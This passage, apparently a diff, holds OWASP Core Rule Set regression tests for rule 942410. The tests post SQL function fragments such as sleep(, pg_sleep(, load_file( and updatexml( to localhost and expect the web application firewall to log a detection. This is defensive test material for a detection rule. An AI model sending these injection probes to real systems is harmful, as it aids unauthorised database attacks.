text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=format%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-45 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-46 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-47 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-48 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-49 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-50 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-51 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-52 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-53 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-54 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-55 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-56 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-57 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=local%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-58 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=log%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-59 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-60 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-61 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-62 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-63 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-64 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-65 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-66 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-67 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-68 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "name_const(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-69 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "now(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-70 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "nOW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-71 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ord(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-72 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "password?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-73 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "password/?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-74 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Password>$(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-75 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-76 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pi(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-77 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "PI(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-78 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pow(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-79 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "POW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-80 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "quarter. (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-81 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "rand(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-82 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Rand (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-83 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RAND(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-84 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "replace(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-85 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "REPLACE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-86 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "round (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-87 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "round(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-88 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "rtrim(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-89 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RTRIM(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-90 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sin (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-91 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SIN(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-92 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-93 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SLEEP (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-94 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-95 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=substr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-96 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-97 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=substring(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-98 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-99 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-100 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "time (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-101 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=time%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-102 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-103 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-104 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-105 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-106 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=updatexml%28" + version: HTTP/1.0 